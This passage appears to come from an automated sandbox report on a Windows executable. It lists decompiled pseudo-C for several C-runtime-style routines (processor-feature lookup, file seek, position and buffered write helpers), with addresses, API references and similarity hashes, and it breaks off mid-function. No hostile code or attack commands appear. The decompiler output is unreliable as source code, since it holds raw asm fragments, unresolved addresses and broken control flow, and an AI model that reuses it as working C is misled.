                                                                                                                                                  • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00413610, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                  0x00413615
                                                                                                                                                  0x0041361d
                                                                                                                                                  0x00413634
                                                                                                                                                  0x004135e0
                                                                                                                                                  0x004135e9
                                                                                                                                                  0x004135f5
                                                                                                                                                  0x004135f8
                                                                                                                                                  0x004135fb
                                                                                                                                                  0x004135fd
                                                                                                                                                  0x00413600
                                                                                                                                                  0x00413605
                                                                                                                                                  0x0041360f
                                                                                                                                                  0x00413607
                                                                                                                                                  0x0041360b
                                                                                                                                                  0x0041360b
                                                                                                                                                  0x0041361f
                                                                                                                                                  0x00413625
                                                                                                                                                  0x0041362d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0041362f
                                                                                                                                                  0x0041362f
                                                                                                                                                  0x00413633
                                                                                                                                                  0x00413633
                                                                                                                                                  0x0041362d

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                                                  • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                  • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                  • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                  • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040C748, Relevance: 6.1, APIs: 4, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}






























                                                                                                                                                  0x0040c748
                                                                                                                                                  0x0040c748
                                                                                                                                                  0x0040c752
                                                                                                                                                  0x0040c755
                                                                                                                                                  0x0040c757
                                                                                                                                                  0x0040c759
                                                                                                                                                  0x0040c77c
                                                                                                                                                  0x0040c781
                                                                                                                                                  0x0040c785
                                                                                                                                                  0x0040c788
                                                                                                                                                  0x0040c78a
                                                                                                                                                  0x0040c78a
                                                                                                                                                  0x0040c78d
                                                                                                                                                  0x0040c78f
                                                                                                                                                  0x0040c790
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c799
                                                                                                                                                  0x0040c79b
                                                                                                                                                  0x0040c79e
                                                                                                                                                  0x0040c773
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7a0
                                                                                                                                                  0x0040c7a0
                                                                                                                                                  0x0040c7a3
                                                                                                                                                  0x0040c7a9
                                                                                                                                                  0x0040c7b3
                                                                                                                                                  0x0040c7b5
                                                                                                                                                  0x0040c7b8
                                                                                                                                                  0x0040c7bd
                                                                                                                                                  0x0040c7c0
                                                                                                                                                  0x0040c7c3
                                                                                                                                                  0x0040c806
                                                                                                                                                  0x0040c808
                                                                                                                                                  0x0040c7f9
                                                                                                                                                  0x0040c7f9
                                                                                                                                                  0x0040c7fc
                                                                                                                                                  0x0040c81a
                                                                                                                                                  0x0040c81e
                                                                                                                                                  0x0040c8d8
                                                                                                                                                  0x0040c8de
                                                                                                                                                  0x0040c8de
                                                                                                                                                  0x0040c8e0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8e0
                                                                                                                                                  0x0040c824
                                                                                                                                                  0x0040c827
                                                                                                                                                  0x0040c829
                                                                                                                                                  0x0040c843
                                                                                                                                                  0x0040c84a
                                                                                                                                                  0x0040c84f
                                                                                                                                                  0x0040c852
                                                                                                                                                  0x0040c857
                                                                                                                                                  0x0040c8d2
                                                                                                                                                  0x0040c8d5
                                                                                                                                                  0x0040c8d5
                                                                                                                                                  0x0040c8d5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8d5
                                                                                                                                                  0x0040c859
                                                                                                                                                  0x0040c85b
                                                                                                                                                  0x0040c85d
                                                                                                                                                  0x0040c868
                                                                                                                                                  0x0040c86b
                                                                                                                                                  0x0040c88d
                                                                                                                                                  0x0040c88f
                                                                                                                                                  0x0040c892
                                                                                                                                                  0x0040c895
                                                                                                                                                  0x0040c89d
                                                                                                                                                  0x0040c89f
                                                                                                                                                  0x0040c8a6
                                                                                                                                                  0x0040c8ab
                                                                                                                                                  0x0040c8ae
                                                                                                                                                  0x0040c8c0
                                                                                                                                                  0x0040c8c0
                                                                                                                                                  0x0040c8c3
                                                                                                                                                  0x0040c8c3
                                                                                                                                                  0x0040c8c8
                                                                                                                                                  0x0040c8cd
                                                                                                                                                  0x0040c8cd
                                                                                                                                                  0x0040c8cf
                                                                                                                                                  0x0040c8cf
                                                                                                                                                  0x0040c8cf
                                                                                                                                                  0x0040c8cf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8cd
                                                                                                                                                  0x0040c8b0
                                                                                                                                                  0x0040c8b3
                                                                                                                                                  0x0040c8b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8b8
                                                                                                                                                  0x0040c8be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8be
                                                                                                                                                  0x0040c8a1
                                                                                                                                                  0x0040c8a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c8a1
                                                                                                                                                  0x0040c86d
                                                                                                                                                  0x0040c873
                                                                                                                                                  0x0040c880
                                                                                                                                                  0x0040c880
                                                                                                                                                  0x0040c882
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c877
                                                                                                                                                  0x0040c87a
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87f
                                                                                                                                                  0x0040c87f
                                                                                                                                                  0x0040c87f
                                                                                                                                                  0x0040c884
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c884
                                                                                                                                                  0x0040c82b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c82b
                                                                                                                                                  0x0040c7fe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7fe
                                                                                                                                                  0x0040c80a
                                                                                                                                                  0x0040c80f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c80f
                                                                                                                                                  0x0040c7ce
                                                                                                                                                  0x0040c7d8
                                                                                                                                                  0x0040c7db
                                                                                                                                                  0x0040c7e0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7e2
                                                                                                                                                  0x0040c7e4
                                                                                                                                                  0x0040c7e6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7e8
                                                                                                                                                  0x0040c7ea
                                                                                                                                                  0x0040c7ea
                                                                                                                                                  0x0040c7ed
                                                                                                                                                  0x0040c7ef
                                                                                                                                                  0x0040c7f2
                                                                                                                                                  0x0040c7f2
                                                                                                                                                  0x0040c7f2
                                                                                                                                                  0x0040c7f4
                                                                                                                                                  0x0040c7f5
                                                                                                                                                  0x0040c7f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7ea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7ab
                                                                                                                                                  0x0040c79e
                                                                                                                                                  0x0040c75b
                                                                                                                                                  0x0040c760
                                                                                                                                                  0x0040c761
                                                                                                                                                  0x0040c762
                                                                                                                                                  0x0040c763
                                                                                                                                                  0x0040c764
                                                                                                                                                  0x0040c765
                                                                                                                                                  0x0040c76b
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                  • __locking.LIBCMT ref: 0040C791
                                                                                                                                                    • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                    • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2395185920-0
                                                                                                                                                  • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                  • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                  • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                  • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00405D00, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                  			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}



















                                                                                                                                                  0x00405d00
                                                                                                                                                  0x00405d00
                                                                                                                                                  0x00405d00
                                                                                                                                                  0x00405d01
                                                                                                                                                  0x00405d07
                                                                                                                                                  0x00405e7f
                                                                                                                                                  0x00405e7f
                                                                                                                                                  0x00405e7f
                                                                                                                                                  0x00405e83
                                                                                                                                                  0x00405d0d
                                                                                                                                                  0x00405d0d
                                                                                                                                                  0x00405d14
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d1a
                                                                                                                                                  0x00405d1a
                                                                                                                                                  0x00405d20
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d2f
                                                                                                                                                  0x00405d34
                                                                                                                                                  0x00405d38
                                                                                                                                                  0x00405dad
                                                                                                                                                  0x00405db0
                                                                                                                                                  0x00405db2
                                                                                                                                                  0x00405db2
                                                                                                                                                  0x00405db2
                                                                                                                                                  0x00405db5
                                                                                                                                                  0x00405db7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405dbd
                                                                                                                                                  0x00405dbd
                                                                                                                                                  0x00405dc1
                                                                                                                                                  0x00405df8
                                                                                                                                                  0x00405dfb
                                                                                                                                                  0x00405dfd
                                                                                                                                                  0x00405e04
                                                                                                                                                  0x00405e09
                                                                                                                                                  0x00405e0c
                                                                                                                                                  0x00405e0e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405dff
                                                                                                                                                  0x00405dff
                                                                                                                                                  0x00405e10
                                                                                                                                                  0x00405e10
                                                                                                                                                  0x00405e12
                                                                                                                                                  0x00405e73
                                                                                                                                                  0x00405e78
                                                                                                                                                  0x00405e14
                                                                                                                                                  0x00405e14
                                                                                                                                                  0x00405e18
                                                                                                                                                  0x00405e2e
                                                                                                                                                  0x00405e2e
                                                                                                                                                  0x00405e32
                                                                                                                                                  0x00405e34
                                                                                                                                                  0x00405e37
                                                                                                                                                  0x00405e38
                                                                                                                                                  0x00405e3c
                                                                                                                                                  0x00405e43
                                                                                                                                                  0x00405e45
                                                                                                                                                  0x00405e45
                                                                                                                                                  0x00405e43
                                                                                                                                                  0x00405e4c
                                                                                                                                                  0x00405e4e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e50
                                                                                                                                                  0x00405e50
                                                                                                                                                  0x00405e50
                                                                                                                                                  0x00405e55
                                                                                                                                                  0x00405e57
                                                                                                                                                  0x00405e59
                                                                                                                                                  0x00405e59
                                                                                                                                                  0x00405e61
                                                                                                                                                  0x00405e66
                                                                                                                                                  0x00405e69
                                                                                                                                                  0x00405e6b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e6d
                                                                                                                                                  0x00405e6f
                                                                                                                                                  0x00405e71
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e71
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e50
                                                                                                                                                  0x00405e1a
                                                                                                                                                  0x00405e1f
                                                                                                                                                  0x00405e24
                                                                                                                                                  0x00405e27
                                                                                                                                                  0x00405e2a
                                                                                                                                                  0x00405e2c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e2c
                                                                                                                                                  0x00405e18
                                                                                                                                                  0x00405e12
                                                                                                                                                  0x00405dc3
                                                                                                                                                  0x00405dc9
                                                                                                                                                  0x00405dcb
                                                                                                                                                  0x00405dcc
                                                                                                                                                  0x00405dcd
                                                                                                                                                  0x00405dd4
                                                                                                                                                  0x00405ddb
                                                                                                                                                  0x00405ddd
                                                                                                                                                  0x00405de5
                                                                                                                                                  0x00405de7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405ded
                                                                                                                                                  0x00405ded
                                                                                                                                                  0x00405df0
                                                                                                                                                  0x00405df7
                                                                                                                                                  0x00405df7
                                                                                                                                                  0x00405de7
                                                                                                                                                  0x00405dc1
                                                                                                                                                  0x00405d3a
                                                                                                                                                  0x00405d3c
                                                                                                                                                  0x00405d3e
                                                                                                                                                  0x00405d3e
                                                                                                                                                  0x00405d43
                                                                                                                                                  0x00405e79
                                                                                                                                                  0x00405e7a
                                                                                                                                                  0x00405e7a
                                                                                                                                                  0x00405e7e
                                                                                                                                                  0x00405d49
                                                                                                                                                  0x00405d4d
                                                                                                                                                  0x00405d77
                                                                                                                                                  0x00405d79
                                                                                                                                                  0x00405da7
                                                                                                                                                  0x00405dac
                                                                                                                                                  0x00405d7b
                                                                                                                                                  0x00405d80
                                                                                                                                                  0x00405d80
                                                                                                                                                  0x00405d87
                                                                                                                                                  0x00405d89
                                                                                                                                                  0x00405d89
                                                                                                                                                  0x00405d91
                                                                                                                                                  0x00405d96
                                                                                                                                                  0x00405d9b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405da1
                                                                                                                                                  0x00405da5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405da5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d80
                                                                                                                                                  0x00405d4f
                                                                                                                                                  0x00405d54
                                                                                                                                                  0x00405d59
                                                                                                                                                  0x00405d5c
                                                                                                                                                  0x00405d61
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d67
                                                                                                                                                  0x00405d6f
                                                                                                                                                  0x00405d74
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d74
                                                                                                                                                  0x00405d61
                                                                                                                                                  0x00405d4d
                                                                                                                                                  0x00405d43
                                                                                                                                                  0x00405d38
                                                                                                                                                  0x00405d20
                                                                                                                                                  0x00405d14
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _fseek_malloc_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 208892515-0
                                                                                                                                                  • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                  • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                  • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                  • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040BAAA, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
